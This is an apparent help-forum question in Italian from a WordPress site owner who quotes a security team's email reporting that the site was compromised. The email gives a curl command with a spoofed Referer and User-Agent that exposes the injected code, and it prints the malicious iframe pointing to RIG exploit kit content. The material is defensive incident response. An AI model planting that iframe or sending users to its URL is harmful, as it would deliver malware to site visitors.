Ho ricevuto una mail da un determinato team di risposta agli incidenti di sicurezza per conto di un dipartimento degli Stati Uniti e dice:
The below URL is currently being used to deliver a payload of malicious software to a visiting victim’s computer. The current malicious payload appears to be on a server under your control and we are working on behalf of US Department of Health and Human Services (HHS) to remove the infectious content.
The above URL has been compromised, code containing a malicious iframe that points to the RIG exploit kit has been added to the website. A sample of the iframe pointing to the RIG exploit kit is below.
3) On a Linux or Mac system, open the Terminal and execute the following command after removing all bracket characters – these: [] – and changing all instances of "hXXp" to "http":
curl -H "Referer:hXXp://www[.]ourhostedweb[.]com/index[.]php/url-name/" -H "User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "hXXp://www.victimweb[.]com/"
Search for the term "iframe" in the returned source code. There will be an iframe on line 105 whose source URL is the exploit kit content. Currently this content is being sourced from www[.]ourhostedweb[.]com – this may change at any time as long as the site remains compromised.
e il numero di riga 105 contiene il seguente codice iframe:
<iframe src="http://gone.MDVEND.COM/?oq=m3WpvAoLeZRbFLhhUPULVAwn45aBlIX_qmnhkjUyRDK1sWA-xOKUTp1u9CWUbI&es_sm=147&q=wXjQMvXcJwDQD4bGMvrESLtNNknQA0KK2Iv2_dqyEoH9fmnihNzUSkr26B2aC&ie=Windows-1252&sourceid=yandex&aqs=yandex.114e103.406b1a7"width="258" height="266"></iframe>
Edit given contact in the mail Email: [email protected] Office: +1.253.590.4100 x0 | Fax: +1.888.239.6932 x0
Il sito è sviluppato utilizzando Wordpress.
Quali sono le azioni necessarie che posso intraprendere per questo?